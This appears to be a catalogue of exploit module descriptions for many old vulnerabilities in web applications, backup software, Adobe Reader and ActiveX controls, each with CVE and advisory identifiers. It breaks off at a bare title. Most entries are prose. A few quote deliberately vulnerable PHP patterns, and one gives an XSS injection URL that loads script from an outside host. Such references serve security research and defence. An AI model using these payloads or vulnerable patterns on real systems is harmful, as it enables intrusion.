This module exploits a vulnerability in the picEditor.php script of Coppermine Photo Gallery. When configured to use the ImageMagick library, the 'quality', 'angle', and 'clipval' parameters are not properly escaped before being passed to the PHP 'exec' command. In order to reach the vulnerable 'exec' call, the input must pass several validation steps. The vulnerabilities actually reside in the following functions: image_processor.php: rotate_image(...); include/imageObjectIM.class.php: imageObject::cropImage(...); include/imageObjectIM.class.php: imageObject::rotateImage(...); include/imageObjectIM.class.php: imageObject::resizeImage(...); include/picmgmt.inc.php: resize_image(...). NOTE: Use of the ImageMagick library is a non-default option. However, a user can specify its use at installation time. CVE-2008-0506 OSVDB-41676 http://www.exploit-db.com/exp... http://forum.coppermine-galle...

Dogfood CRM spell.php Remote Command Execution
This module exploits a previously unpublished vulnerability in the Dogfood CRM mail function which is vulnerable to command injection in the spell check feature. Because of character restrictions, this exploit works best with the double-reverse telnet payload. This vulnerability was discovered by LSO and affects v2.0.10. OSVDB-54707 http://downloads.sourceforge....

Google Appliance ProxyStyleSheet Command Execution
This module exploits a feature in the Saxon XSLT parser used by the Google Search Appliance. This feature allows for arbitrary java methods to be called. Google released a patch and advisory to their client base in August of 2005 (GA-2005-08-m). The target appliance must be able to connect back to your machine for this exploit to work. CVE-2005-3757 OSVDB-20981 BID-15509

Matt Wright guestbook.pl Arbitrary Command Execution
The Matt Wright guestbook.pl <= v2.3.1 CGI script contains a flaw that may allow arbitrary command execution. The vulnerability requires that HTML posting is enabled in the guestbook.pl script, and that the web server must have the Server-Side Include (SSI) script handler enabled for the '.html' file type. By combining the script weakness with non-default server configuration, it is possible to exploit this vulnerability successfully. CVE-1999-1053 OSVDB-84 BID-776

Joomla 1.5.12 TinyBrowser File Upload Code Execution
This module exploits a vulnerability in the TinyMCE/tinybrowser plugin. This plugin is not secured in version 1.5.12 of Joomla and allows the upload of files to the remote server. By renaming the uploaded file, this vulnerability can be used to upload and execute code on the affected system. OSVDB-64578 http://milw0rm.com/exploits/9296 http://developer.joomla.org/s...

Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include
This module exploits a remote file inclusion vulnerability in includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo 4.6.4 and earlier. CVE-2008-2905 OSVDB-46173 BID-29716

Nagios3 statuswml.cgi Ping Command Execution
This module abuses a metacharacter injection vulnerability in the Nagios3 statuswml.cgi script. This flaw is triggered when shell metacharacters are present in the parameters to the ping and traceroute commands. CVE-2009-2288 OSVDB-55281

HP Openview connectedNodes.ovpl Remote Command Execution
This module exploits an arbitrary command execution vulnerability in the HP OpenView connectedNodes.ovpl CGI application. The results of the command will be displayed to the screen. CVE-2005-2773 OSVDB-19057 BID-14662

OpenX banner-edit.php File Upload PHP Code Execution
This module exploits a vulnerability in the OpenX advertising software. In versions prior to version 2.8.2, authenticated users can upload files with arbitrary extensions to be used as banner creative content. By uploading a file with a PHP extension, an attacker can execute arbitrary PHP code. NOTE: The file must also return either "png", "gif", or "jpeg" as its image type as returned from the PHP getimagesize() function. CVE-2009-4098 OSVDB-60499 BID-37110 http://archives.neohapsis.com... https://developer.openx.org/j... http://www.openx.org/docs/2.8... http://php.net/manual/en/func... http://gynvael.coldwind.pl/?i... http://gynvael.coldwind.pl/?i... http://gynvael.coldwind.pl/?i... http://programming.arantius.c... http://stackoverflow.com/ques...

osCommerce 2.2 Arbitrary PHP Code Execution
osCommerce is a popular open source E-Commerce application. The admin console contains a file management utility that allows administrators to upload, download, and edit files. This could be abused to allow unauthenticated attackers to execute arbitrary code with the permissions of the webserver. OSVDB-60018 http://www.milw0rm.com/exploi...

PAJAX Remote Command Execution
RedTeam has identified two security flaws in PAJAX (<= 0.5.1). It is possible to execute arbitrary PHP code from unchecked user input. Additionally, it is possible to include arbitrary files on the server ending in ".class.php". CVE-2006-1551 OSVDB-24618 BID-17519 http://www.redteam-pentesting...

Generic PHP Code eval
Exploits things like <?php eval($_REQUEST['evalme']); ?>. It is likely that HTTP evasion options will break this exploit.

PHP Remote File Include Generic Exploit
This module can be used to exploit any generic PHP file include vulnerability, where the application includes code like the following: <?php include($_GET['path']); ?>

vBulletin misc.php Template Name Arbitrary Code Execution
This module exploits an arbitrary PHP code execution flaw in the vBulletin web forum software. This vulnerability is only present when the "Add Template Name in HTML Comments" option is enabled. All versions of vBulletin prior to 3.0.7 are affected. CVE-2005-0511 BID-12622 OSVDB-14047

WordPress cache_lastpostdate Arbitrary Code Execution
This module exploits an arbitrary PHP code execution flaw in the WordPress blogging software. This vulnerability is only present when the PHP 'register_globals' option is enabled (common for hosting providers). All versions of WordPress prior to 1.5.1.3 are affected. CVE-2005-2612 OSVDB-18672 BID-14533

PHP XML-RPC Arbitrary Code Execution
This module exploits an arbitrary code execution flaw discovered in many implementations of the PHP XML-RPC module. This flaw is exploitable through a number of PHP web applications, including but not limited to Drupal, Wordpress, Postnuke, and TikiWiki. CVE-2005-1921 OSVDB-17793 BID-14088

phpBB viewtopic.php Arbitrary Code Execution
This module exploits two arbitrary PHP code execution flaws in the phpBB forum system. The problem is that the 'highlight' parameter in the 'viewtopic.php' script is not verified properly and will allow an attacker to inject arbitrary code via preg_replace(). This vulnerability was introduced in revision 3076, and finally fixed in revision 5166. According to the "tags" within their tree, this corresponds to versions 2.0.4 through 2.0.15 (inclusive). CVE-2005-2086 CVE-2004-1315 OSVDB-11719 OSVDB-17613 BID-14086 BID-10701

PhpMyAdmin Config File Code Injection
This module exploits a vulnerability in PhpMyAdmin's setup feature which allows an attacker to inject arbitrary PHP code into a configuration file. The original advisory says the vulnerability is present in phpMyAdmin versions 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1; this module was tested on 3.0.1.1. The file where our payload is written (phpMyAdmin/config/config.inc.php) is not directly used by the system, so it may be a good idea to either delete it or copy the running config (phpMyAdmin/config.inc.php) over it after successful exploitation. CVE-2009-1151 OSVDB-53076 http://www.milw0rm.com/exploi... http://www.phpmyadmin.net/hom... http://labs.neohapsis.com/200...

QuickTime Streaming Server parse_xml.cgi Remote Execution
The QuickTime Streaming Server contains a CGI script that is vulnerable to metacharacter injection, allowing arbitrary commands to be executed as root. OSVDB-10562 BID-6954 CVE-2003-0050

Simple PHP Blog <= 0.4.0 Remote Command Execution
This module combines three separate issues within The Simple PHP Blog (<= 0.4.0) application to upload arbitrary data and thus execute a shell. The first vulnerability exposes the hash file (password.txt) to unauthenticated users. The second vulnerability lies within the image upload system provided to logged-in users; there is no image validation function in the blogger to prevent an authenticated user from uploading any file type. The third vulnerability occurs within the blog comment functionality, allowing arbitrary files to be deleted. CVE-2005-2733 OSVDB-19012 BID-14667 http://www.milw0rm.com/exploi...

SquirrelMail PGP Plugin command execution (SMTP)
This module exploits a command execution vulnerability in the PGP plugin of SquirrelMail. This flaw was found while quickly grepping the code after release of some information at http://www.wslabi.com/. Later, iDefense published an advisory .... Reading an email in SquirrelMail with the PGP plugin activated is enough to compromise the underlying server. Only "cmd/unix/generic" payloads were tested. CVE-2003-0990 OSVDB-3178 http://lists.immunitysec.com/... http://labs.idefense.com/inte... http://www.wslabi.com/wabisab...

TikiWiki tiki-graph_formula Remote PHP Code Execution
TikiWiki (<= 1.9.8) contains a flaw that may allow a remote attacker to execute arbitrary PHP code. The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input supplied to create_function(), which may allow a remote attacker to execute arbitrary PHP code resulting in a loss of integrity. CVE-2007-5423 OSVDB-40478 BID-26006

TikiWiki jhot Remote Command Execution
TikiWiki contains a flaw that may allow a malicious user to execute arbitrary PHP code. The issue is triggered due to the jhot.php script not correctly verifying uploaded files. It is possible that the flaw may allow arbitrary PHP code execution by uploading a malicious PHP script resulting in a loss of integrity. The vulnerability was reported in Tikiwiki version 1.9.4. CVE-2006-4602 OSVDB-28456 BID-19819 http://secunia.com/advisories...

TWiki History TWikiUsers rev Parameter Command Execution
This module exploits a vulnerability in the history component of TWiki. By passing a 'rev' parameter containing shell metacharacters to the TWikiUsers script, an attacker can execute arbitrary OS commands. CVE-2005-2877 OSVDB-19403 BID-14834 http://twiki.org/cgi-bin/view...

TWiki Search Function Arbitrary Command Execution
This module exploits a vulnerability in the search component of TWiki. By passing a 'search' parameter containing shell metacharacters to the 'WebSearch' script, an attacker can execute arbitrary OS commands. CVE-2004-1037 OSVDB-11714 BID-11674 http://twiki.org/cgi-bin/view...

Symantec Alert Management System Intel Alert Originator Service Buffer Overflow
This module exploits a stack buffer overflow in Intel Alert Originator Service msgsys.exe. When an attacker sends a specially crafted alert, arbitrary code may be executed. CVE-2009-1430 OSVDB-54159 BID-34674

Symantec Remote Management Buffer Overflow
This module exploits a stack buffer overflow in Symantec Client Security 3.0.x. This module has only been tested against Symantec Client Security 3.0.2 build 10.0.2.2000. CVE-2006-2630 OSVDB-25846 BID-18107 http://research.eeye.com/html...

Trend Micro ServerProtect 5.58 Buffer Overflow
This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code. CVE-2007-1070 OSVDB-33042 BID-22639

Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow
This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code. CVE-2007-2508 OSVDB-35790 BID-23868

Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow
This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060 EarthAgent.EXE. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code. CVE-2007-2508 OSVDB-35789 BID-23866

Arkeia Backup Client Type 77 Overflow (Win32)
This module exploits a stack buffer overflow in the Arkeia backup client for the Windows platform. This vulnerability affects all versions up to and including 5.3.3. CVE-2005-0491 OSVDB-14011 BID-12594 http://lists.netsys.com/piper...

Energizer DUO Trojan Code Execution
This module will execute an arbitrary payload against any system infected with the Arugizer trojan horse. This backdoor was shipped with the software package accompanying the Energizer Duo USB battery charger. CVE-2010-0103 OSVDB-62782 US-CERT-VU-154421

Veritas Backup Exec Name Service Overflow
This module exploits a vulnerability in the Veritas Backup Exec Agent Browser service. This vulnerability occurs when a recv() call has a length value too long for the destination stack buffer. By sending an agent name value of 63 bytes or more, we can overwrite the return address of the recv function. Since we only have ~60 bytes of contiguous space for shellcode, a tiny findsock payload is sent which uses a hardcoded IAT address for the recv() function. This payload will then roll the stack back to the beginning of the page, recv() the real shellcode into it, and jump to it. This module has been tested against Veritas 9.1 SP0, 9.1 SP1, and 8.6. CVE-2004-1172 OSVDB-12418 BID-11974 http://www.idefense.com/appli...

Veritas Backup Exec Windows Remote Agent Overflow
This module exploits a stack buffer overflow in the Veritas BackupExec Windows Agent software. This vulnerability occurs when a client authentication request is received with type '3' and a long password argument. Reliable execution is obtained by abusing the stack buffer overflow to smash a SEH pointer. CVE-2005-0773 OSVDB-17624 BID-14022 http://www.idefense.com/appli... http://seer.support.veritas.c...

Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow
This module exploits a buffer overflow in Computer Associates BrightStor ARCserve r11.5 (build 3884). By sending a specially crafted RPC request to opcode 0x342, an attacker could overflow the buffer and execute arbitrary code. In order to successfully exploit this vulnerability, you will need to set the hostname argument (HNAME). BID-31684 OSVDB-49468 CVE-2008-4397 http://crackinglandia.blogspo...

CA BrightStor Discovery Service TCP Overflow
This module exploits a vulnerability in the CA BrightStor Discovery Service. This vulnerability occurs when a specific type of request is sent to the TCP listener on port 41523. This vulnerability was discovered by cybertronic[at]gmx.net and affects all known versions of the BrightStor product. This module is based on the 'cabrightstor_disco' exploit by Thor Doomen. CVE-2005-2535 OSVDB-13814 BID-12536 http://archives.neohapsis.com... http://milw0rm.com/exploits/1131

CA BrightStor Discovery Service Stack Buffer Overflow
This module exploits a vulnerability in the CA BrightStor Discovery Service. This vulnerability occurs when a large request is sent to UDP port 41524, triggering a stack buffer overflow. CVE-2005-0260 OSVDB-13613 BID-12491 http://www.idefense.com/appli...

Computer Associates Alert Notification Buffer Overflow
This module exploits a buffer overflow in Computer Associates Threat Manager for the Enterprise r8.1. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code. In order to successfully exploit this vulnerability, you will need valid logon credentials to the target. CVE-2007-4620 OSVDB-44040 BID-28605

CA BrightStor HSM Buffer Overflow
This module exploits one of the multiple stack buffer overflows in Computer Associates BrightStor HSM. By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code. CVE-2007-5082 OSVDB-41363 BID-25823

CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code. CVE-2007-0449 OSVDB-31593 BID-22342

CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code. CVE-2007-5003 OSVDB-41353 BID-24348

CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request (rxsUseLicenseIni), an attacker could overflow the buffer and execute arbitrary code. CVE-2007-3216 OSVDB-35329 BID-24348

CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup 11.0. By sending a specially crafted request to the lic98rmtd.exe service, an attacker could overflow the buffer and execute arbitrary code. CVE-2005-0581 OSVDB-14389 BID-12705

CA BrightStor ArcServe Media Service Stack Buffer Overflow
This exploit targets a stack buffer overflow in the MediaSrv RPC service of CA BrightStor Arcserve. By sending a specially crafted SUNRPC request, an attacker can overflow a stack buffer and execute arbitrary code. CVE-2007-2139 OSVDB-35326 BID-23635 https://www.zerodayinitiative...

CA BrightStor ARCserve Message Engine Buffer Overflow
This module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup 11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code. CVE-2007-0169 OSVDB-31318 BID-22005

CA BrightStor ARCserve Message Engine Heap Overflow
This module exploits a heap overflow in Computer Associates BrightStor ARCserve Backup 11.5. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code. CVE-2006-5143 OSVDB-29533 BID-20365

CA BrightStor Agent for Microsoft SQL Overflow
This module exploits a vulnerability in the CA BrightStor Agent for Microsoft SQL Server. This vulnerability was discovered by cybertronic[at]gmx.net. CVE-2005-1272 OSVDB-18501 BID-14453 http://www.idefense.com/appli... http://www3.ca.com/securityad...

CA BrightStor ARCserve Tape Engine Buffer Overflow
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code. CVE-2006-6076 OSVDB-30637 BID-21221 http://www.milw0rm.com/exploi... http://www.ca.com/us/security...

CA BrightStor Universal Agent Overflow
This module exploits a convoluted heap overflow in the CA BrightStor Universal Agent service. Triple userland exception results in heap growth and execution of dereferenced function pointer at a specified address. CVE-2005-1018 OSVDB-15471 BID-13102 http://www.idefense.com/appli...

Adobe Flash Player "newfunction" Invalid Pointer Use
This module exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due to the hardcoded syscall number. CVE-2010-1297 OSVDB-65141 BID-40586 http://www.adobe.com/support/... http://feliam.wordpress.com/2...

Adobe FlateDecode Stream Predictor 02 Integer Overflow
This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2. CVE-2009-3459 BID-36600 OSVDB-58729 http://blogs.adobe.com/psirt/... http://www.adobe.com/support/... http://www.fortiguard.com/ana...

Adobe Collab.getIcon() Buffer Overflow
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted PDF that contains a malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code. CVE-2009-0927 OSVDB-53647 http://www.zerodayinitiative....

Adobe JBIG2Decode Memory Corruption Exploit
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon javascript for the heap spray. CVE-2009-0658 OSVDB-52073 http://bl4cksecurity.blogspot...

Adobe Doc.media.newPlayer Use After Free Vulnerability
This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat Professional versions up to and including 9.2. CVE-2009-4324 BID-37331 OSVDB-60980

Adobe util.printf() Buffer Overflow
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted PDF that contains a malformed util.printf() entry, an attacker may be able to execute arbitrary code. CVE-2008-2992 OSVDB-49520

AOL Instant Messenger goaway Overflow
This module exploits a flaw in the handling of AOL Instant Messenger's 'goaway' URI handler. An attacker can execute arbitrary code by supplying an overly sized buffer as the 'message' parameter. This issue is known to affect AOL Instant Messenger 5.5. CVE-2004-0636 OSVDB-8398 BID-10889 http://www.idefense.com/appli...

Amaya Browser v11.0 bdo tag overflow
This module exploits a stack buffer overflow in the Amaya v11 Browser. By sending an overly long string to the "bdo" tag, an attacker may be able to execute arbitrary code. CVE-2009-0323 OSVDB-55721 BID-33046, 33047

AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow
This module exploits a stack-based buffer overflow in AOL IWinAmpActiveX class (AmpX.dll) version 2.4.0.6 installed via AOL Radio website. By setting an overly long value to 'ConvertFile()', an attacker can overrun a buffer and execute arbitrary code. OSVDB-54706 BID-35028 http://www.milw0rm.com/exploi...

America Online ICQ ActiveX Control Arbitrary File Download and Execute
This module allows remote attackers to download and execute arbitrary files on a user's system via the DownloadAgent function of the ICQPhone.SipxPhoneManager ActiveX control. CVE-2006-5650 OSVDB-30220 BID-20930 http://www.zerodayinitiative....

Apple ITunes 4.7 Playlist Buffer Overflow
This module exploits a stack buffer overflow in Apple ITunes 4.7 build 4.7.0.42. By creating a URL link to a malicious PLS file, a remote attacker could overflow a buffer and execute arbitrary code. When using this module, be sure to set the URIPATH with an extension of '.pls'. CVE-2005-0043 OSVDB-12833 BID-12238

Apple QuickTime 7.1.3 RTSP URI Buffer Overflow
This module exploits a buffer overflow in Apple QuickTime 7.1.3. This module was inspired by MOAB-01-01-2007. The Browser target for this module was tested against IE 6 and Firefox 1.5.0.3 on Windows XP SP0/2; Firefox 3 blacklists the QuickTime plugin. CVE-2007-0015 OSVDB-31023 BID-21829 http://projects.info-pull.com...

Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Ask.com Toolbar 4.0.2.53. An attacker may be able to execute arbitrary code by sending an overly long string to the "ShortFormat()" method in askbar.dll. CVE-2007-5107 OSVDB-37735 http://wslabi.com/wabisabilab...

AtHocGov IWSAlerts ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in AtHocGov IWSAlerts. When sending an overly long string to the CompleteInstallation() method of AtHocGovTBr.dll (6.1.4.36) an attacker may be able to execute arbitrary code. This vulnerability was silently patched by the vendor. http://www.athoc.com/products...

Autodesk IDrop ActiveX Control Heap Memory Corruption
This module exploits a heap-based memory corruption vulnerability in Autodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160. An attacker can execute arbitrary code by triggering a heap use after free condition using the Src, Background, PackageXml properties. OSVDB-53265 BID-34352 http://www.milw0rm.com/exploi... http://marc.info/?l=full-disc...

AwingSoft Winds3D Player SceneURL Buffer Overflow
This module exploits a data segment buffer overflow within Winds3D Viewer of AwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). This ActiveX is a plugin of AwingSoft Web3D Player. By setting an overly long value to the 'SceneURL' property, an attacker can overrun a buffer and execute arbitrary code. CVE-2009-4588 OSVDB-60017 http://www.milw0rm.com/exploi... http://www.shinnai.net/exploi... http://www.rec-sec.com/2009/0...

AwingSoft Winds3D Player 3.5 SceneURL Download and Execute
This module exploits an untrusted program execution vulnerability within the Winds3D Player from AwingSoft. The Winds3D Player is a browser plugin for IE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL' parameter to the URL to an executable, an attacker can execute arbitrary code. Testing was conducted using plugin version 3.5.0.9 for Firefox 3.5 and IE 8 on Windows XP SP3. CVE-2009-4850 OSVDB-60049

BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow
This module exploits a buffer overflow in BaoFeng's Storm media Player ActiveX control. Versions of mps.dll including 3.9.4.27 and lower are affected. When passing an overly long string to the method "OnBeforeVideoDownload" an attacker can execute arbitrary code. CVE-2009-1612 OSVDB-54169 BID-34789 http://www.exploit-db.com/exp...

RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow
This module exploits a stack buffer overflow in RKD Software Barcode Application ActiveX Control 'BarCodeAx.dll'. By sending an overly long string to the BeginPrint method of BarCodeAx.dll v4.9, an attacker may be able to execute arbitrary code. http://www.milw0rm.com/exploi... OSVDB-37482 BID-24596 CVE-2007-3435

CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow
The CA BrightStor ARCserve Backup ActiveX control (ListCtrl.ocx) is vulnerable to a stack-based buffer overflow. By passing an overly long argument to the AddColumn() method, a remote attacker could overflow a buffer and execute arbitrary code on the system. CVE-2008-1472 OSVDB-43214

Chilkat Crypt ActiveX WriteFile Unsafe Method
This module allows attackers to execute code via the 'WriteFile' unsafe method of Chilkat Software Inc's Crypt ActiveX control. This exploit is based on shinnai's exploit that uses an hcp:// protocol URI to execute our payload immediately. However, this method requires that the victim user be browsing as Administrator. Additionally, this method will not work on newer versions of Windows. NOTE: This vulnerability is still unpatched. The latest version of Chilkat Crypt at the time of this writing includes ChilkatCrypt2.DLL version 4.4.4.0. CVE-2008-5002 OSVDB-49510 BID-32073 http://www.exploit-db.com/exp...

CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow
This module exploits a stack buffer overflow in the ANSMTP.dll/AOSMTP.dll ActiveX Control provided by CommuniCrypt Mail 1.16. By sending an overly long string to the "AddAttachments()" method, an attacker may be able to execute arbitrary code. OSVDB-64839 http://www.exploit-db.com/exp...

Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Creative Software AutoUpdate Engine. When sending an overly long string to the cachefolder() property of CTSUEng.ocx an attacker may be able to execute arbitrary code. CVE-2008-0955 OSVDB-45655

Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution
This module exploits a command execution vulnerability within the DX Studio Player from Worldweaver. The player is a browser plugin for IE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web page referring to a specially crafted .dxstudio document, an attacker can execute arbitrary commands. Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20 and IE 6 on Windows XP SP3. In IE, the user will be prompted if they wish to allow the plug-in to access local files. This prompt appears to occur only once per server host. NOTE: This exploit uses additionally dangerous script features to write to local files! CVE-2009-2011 BID-35273 OSVDB-54969 http://www.exploit-db.com/exp... http://dxstudio.com/guide.aspx

Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl ActiveX Control (NPSnpy.dll 1.1.0.36). When sending an overly long string to the CheckRequirements() method, an attacker may be able to execute arbitrary code. CVE-2007-4466 OSVDB-37723

FlipViewer FViewerLoading ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in E-BOOK Systems FlipViewer 4.0. The vulnerability is caused due to a boundary error in the FViewerLoading (FlipViewerX.dll) ActiveX control when handling the "LoadOpf()" method. CVE-2007-2919 OSVDB-37042 BID-24328

EnjoySAP SAP GUI ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in SAP KWEdit ActiveX Control (kwedit.dll 6400.1.1.41) provided by EnjoySAP GUI. By sending an overly long string to the "PrepareToPostHTML()" method, an attacker may be able to execute arbitrary code. CVE-2007-3605 OSVDB-37690 BID-24772

Facebook Photo Uploader 4 ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Facebook Photo Uploader 4. By sending an overly long string to the "ExtractIptc()" property located in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute arbitrary code. CVE-2008-5711 OSVDB-41073 BID-27534 http://milw0rm.com/exploits/5049

GOM Player ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in GOM Player 2.1.6.3499. By sending an overly long string to the "OpenUrl()" method located in the GomWeb3.dll Control, an attacker may be able to execute arbitrary code. CVE-2007-5779 OSVDB-38282 http://secunia.com/advisories...

Green Dam URL Processing Buffer Overflow
This module exploits a stack-based buffer overflow in Green Dam Youth Escort version 3.17 in the way it handles overly long URLs. By setting an overly long URL, an attacker can overrun a buffer and execute arbitrary code. This module uses the .NET DLL memory technique by Alexander Sotirov and Mark Dowd and should bypass DEP, NX and ASLR. OSVDB-55126 http://www.cse.umich.edu/~jha... http://www.milw0rm.com/exploi... http://taossa.com/archive/bh0...

Persits XUpload ActiveX AddFile Buffer Overflow
This module exploits a stack buffer overflow in Persits Software Inc's XUpload ActiveX control (version 3.0.0.3) that is included in HP LoadRunner 9.5. By passing an overly long string to the AddFile method, an attacker may be able to execute arbitrary code. CVE-2008-0492 OSVDB-40762 BID-27456 http://www.milw0rm.com/exploi... http://lists.grok.org.uk/pipe...

HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow
This module exploits a stack buffer overflow in Persits Software Inc's XUpload ActiveX control (version 2.1.0.1) that is included in HP LoadRunner 9.0. By passing an overly long string to the AddFolder method, an attacker may be able to execute arbitrary code. CVE-2007-6530 OSVDB-39901 BID-27025 http://lists.grok.org.uk/pipe...

HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow
This module exploits a stack-based buffer overflow in SPIDERLib.Loader ActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD) for Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and 8.2 SP1 before Patch 32. By setting an overly long value to 'ProgColor', an attacker can overrun a buffer and execute arbitrary code. CVE-2007-1819 OSVDB-34317 BID-23239 http://labs.idefense.com/inte...

Hyleos ChemView ActiveX Control Stack Buffer Overflow
This module exploits a stack-based buffer overflow within version 1.9.5.1 of Hyleos ChemView (HyleosChemView.ocx). By calling the 'SaveAsMolFile' or 'ReadMolFile' methods with an overly long first argument, an attacker can overrun a buffer and execute arbitrary code. CVE-2010-0679 OSVDB-62276 http://www.security-assessmen... http://www.exploit-db.com/exp...

IBM Access Support ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in IBM Access Support. When sending an overly long string to the GetXMLValue() method of IbmEgath.dll (3.20.284.0) an attacker may be able to execute arbitrary code. CVE-2009-0215 OSVDB-52958 BID-34228

IBM Lotus Domino Web Access Upload Module Buffer Overflow
This module exploits a stack buffer overflow in IBM Lotus Domino Web Access Upload Module. By sending an overly long string to the "General_ServerName()" property located in the dwa7w.dll and the inotes6w.dll control, an attacker may be able to execute arbitrary code. CVE-2007-4474 OSVDB-40954 BID-26972 http://milw0rm.com/exploits/4820

Internet Explorer COM CreateObject Code Execution
This module exploits a generic code execution vulnerability in Internet Explorer by abusing vulnerable ActiveX objects. MSB-MS06-014 CVE-2006-0003 OSVDB-24517 MSB-MS06-073 CVE-2006-4704 OSVDB-30155

Internet Explorer isComponentInstalled Overflow
This module exploits a stack buffer overflow in Internet Explorer. This bug was patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC. CVE-2006-1016 OSVDB-31647 BID-16870

Internet Explorer Unsafe Scripting Misconfiguration
This exploit takes advantage of the "Initialize and script ActiveX controls not marked safe for scripting" setting within Internet Explorer. When this option is set, IE allows access to the WScript.Shell ActiveX control, which allows javascript to interact with the file system and run commands. This security flaw is not uncommon in corporate environments for the 'Intranet' or 'Trusted Site' zones. In order to save binary data to the file system, ADODB.Stream access is required, which in IE7 will trigger a cross domain access violation. As such, we write the code to a .vbs file and execute it from there, where no such restrictions exist. When set via domain policy, the most common registry entry to modify is HKLM\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1201, which if set to '0' forces ActiveX controls not marked safe for scripting to be enabled for the Intranet zone. This module creates a javascript/html hybrid that will render correctly either via a direct GET http://msf-server/ or as a javascript include, such as in: http://intranet-server/xss.asp?id="><script%20src=http://10.10.10.10/ie_unsafe_script.js> </script>. http://support.microsoft.com/... http://blog.invisibledenizen....

Sun Java Web Start Plugin Command Line Argument Injection
This module exploits a flaw in the Web Start plugin component of Sun Java Web Start. The arguments passed to Java Web Start are not properly validated. By passing the lesser known -J option, an attacker can pass arbitrary options directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed by Ruben Santamarta, an attacker can execute arbitrary code in the context of an unsuspecting browser user. This vulnerability was originally discovered independently by both Ruben Santamarta and Tavis Ormandy. Tavis reported that all versions since version 6 Update 10 "are believed to be affected by this vulnerability." In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled. CVE-2010-0886 OSVDB-63648 BID-39346 http://archives.neohapsis.com... http://www.reversemode.com/in...

Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow
